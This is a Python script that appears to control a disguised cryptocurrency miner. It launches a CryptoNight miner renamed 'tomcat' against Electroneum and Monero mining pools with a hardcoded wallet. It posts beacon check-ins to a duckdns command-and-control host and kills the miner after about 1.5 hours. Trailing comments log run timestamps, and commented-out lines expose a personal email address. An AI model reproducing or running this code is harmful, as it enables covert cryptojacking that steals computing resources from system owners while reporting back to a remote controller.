import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:19:05.145937
#2018-02-17 16:06:06.550555
#2018-02-17 17:55:04.353249
#2018-02-17 19:42:05.891775
#2018-02-17 21:31:04.397403
#2018-02-17 23:15:03.731542
#2018-02-18 01:02:07.533915
#2018-02-18 02:50:08.436058
#2018-02-18 04:39:07.729755
#2018-02-18 06:31:02.126830
#2018-02-18 08:19:03.778381
#2018-02-18 10:07:04.967854
#2018-02-18 11:54:01.327456
#2018-02-18 13:39:01.921034
#2018-02-18 15:29:02.099309
#2018-02-18 17:18:06.006070
#2018-02-18 19:07:01.463040
#2018-02-18 20:53:03.200826
#2018-02-18 22:40:06.303459
#2018-02-19 00:29:04.902199
#2018-02-19 02:14:06.865929
#2018-02-19 04:02:03.494462
#2018-02-19 05:46:01.716969
#2018-02-19 07:36:04.534080
#2018-02-19 09:25:01.516973
#2018-02-19 11:14:05.661567
#2018-02-19 13:02:01.524720
#2018-02-19 14:51:04.792378
#2018-02-19 16:38:06.294722
#2018-02-19 18:24:05.402682
#2018-02-19 20:09:06.005770
#2018-02-19 21:58:07.108916
#2018-02-19 23:43:01.577978
#2018-02-20 01:31:02.004617
#2018-02-20 03:19:05.968205
#2018-02-20 05:06:06.513451
#2018-02-20 06:49:06.674720
#2018-02-20 08:35:04.185128
#2018-02-20 10:19:05.355271
#2018-02-20 12:04:07.365003
#2018-02-20 13:52:01.551175
#2018-02-20 15:37:09.105056
#2018-02-20 17:21:05.453441
#2018-02-20 19:12:03.155979
#2018-02-20 21:00:06.249395
#2018-02-20 22:44:06.905276
#2018-02-21 00:26:01.276887
#2018-02-21 02:12:05.883208
#2018-02-21 04:01:07.406091
#2018-02-21 05:48:07.398464
#2018-02-21 07:37:08.052441
#2018-02-21 09:22:01.727001
#2018-02-21 11:10:10.930529
#2018-02-21 12:58:01.564337
#2018-02-21 14:45:11.355848
#2018-02-21 16:33:01.940006
#2018-02-21 18:22:11.715253
#2018-02-21 20:08:04.829418
#2018-02-21 21:55:04.105375
#2018-02-21 23:44:05.111314
#2018-02-22 01:34:04.097668
#2018-02-22 03:22:01.631789
#2018-02-22 05:09:07.483277
#2018-02-22 06:54:07.042033
#2018-02-22 08:42:08.298603
#2018-02-22 10:29:01.618234
#2018-02-22 12:14:10.447724
#2018-02-22 14:00:07.566220
#2018-02-22 15:47:08.083572
#2018-02-22 17:34:05.884206
#2018-02-22 19:20:07.320898
#2018-02-22 21:11:06.670995
#2018-02-22 22:55:06.122212
#2018-02-23 00:42:04.888553
#2018-02-23 02:28:07.170912
#2018-02-23 04:16:04.116682
#2018-02-23 06:03:07.464009
#2018-02-23 07:48:08.077025
#2018-02-23 09:52:06.699197
#2018-02-23 11:57:06.273566
#2018-02-23 13:45:07.112843
#2018-02-23 15:34:08.297152
#2018-02-23 17:22:04.039152
#2018-02-23 19:07:04.132673
#2018-02-23 20:52:07.388474
#2018-02-23 22:36:05.166569
#2018-02-24 00:22:06.241119
#2018-02-24 02:13:07.284654
#2018-02-24 04:03:05.732985
#2018-02-24 05:47:05.331862
#2018-02-24 07:34:04.465864
#2018-02-24 09:20:01.444110
#2018-02-24 11:12:07.604967
#2018-02-24 13:01:07.199535
#2018-02-24 14:48:01.828559
#2018-02-24 16:40:06.535550
#2018-02-24 18:28:05.717209
#2018-02-24 20:14:04.105721
#2018-02-24 22:04:06.251682
#2018-02-25 01:02:04.365098
#2018-02-25 04:32:07.375322
#2018-02-25 07:59:05.104756